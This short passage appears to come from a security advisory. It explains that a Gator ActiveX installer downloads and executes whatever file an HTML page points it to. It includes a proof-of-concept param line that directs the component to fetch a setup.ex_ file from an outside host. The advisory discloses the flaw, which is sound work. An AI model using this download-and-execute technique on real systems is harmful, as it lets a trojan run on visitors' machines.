The issue here is that any HTML page can specify the location of the Gator installation file. The installation file is downloaded, and then it is checked for the filename. If the filename is setup.ex_, it is then decompressed and executed. If the file is not compressed it will still execute it. Of course using this method, a malicious user can easily create an HTML page that makes use of the rogue ActiveX component to point at a Trojan file.
(NOTE: The 'o' of object has been replaced with a '0' to prevent execution)
<param name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">